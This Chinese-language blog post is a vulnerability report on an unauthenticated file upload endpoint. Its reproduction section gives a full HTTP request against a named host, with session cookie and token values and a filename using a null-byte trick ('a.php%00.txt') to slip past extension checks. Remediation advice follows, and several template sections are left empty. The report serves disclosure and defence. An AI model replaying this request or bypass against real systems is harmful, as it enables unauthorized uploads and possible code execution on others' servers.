Skip to content
Stack Ashes
Go back

未授权用户文件上传漏洞


1. 基本信息


2. 漏洞概述

简要描述漏洞的核心问题,包括影响范围和潜在后果。

文件上传功能缺少认证校验,导致攻击者无需登录即可上传任意文件到服务器。泄露敏感信息或导致服务中断。


3. 详细信息

3.1 受影响的接口或功能

3.2 漏洞成因

解释漏洞产生的根本原因,例如:


4. 重现步骤

提供详细的漏洞复现过程,确保漏洞接收方能轻松验证。

  1. 访问目标上传页面或接口:
POST /api/boss/basic/system/file/upload HTTP/1.1
Host: cudboss.nxin.com
Cookie: JSESSIONID=F54B94ACB8F98CB5470908A33BDDBB63; systemId=31
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://cudboss.nxin.com/
Signtoken: 3336B7C506C31634
Systemid: 31
Origin: https://cudboss.nxin.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="a.php%00.txt"
Content-Type: text/plain

This is a test file
------WebKitFormBoundary7MA4YWxkTrZu0gW--

5. 风险评估

5.1 潜在风险


6. 修复建议

6.1 短期措施

6.2 长期措施

  1. 权限控制: 验证上传接口的用户身份和权限。
  2. 文件类型校验:
    • 使用白名单,限制可上传的文件类型(如 .jpg.png)。
    • 验证文件的 MIME 类型和内容是否匹配。
  3. 存储隔离: 将文件存储在非 Web 可访问目录中。
  4. 执行权限禁用: 确保上传目录无法执行脚本文件。
  5. 限制文件大小: 设置合理的文件大小限制。
  6. 病毒扫描: 上传后扫描文件以检测恶意代码。


Share this post on:

Previous Post
whyhackme
Next Post
GoldenEye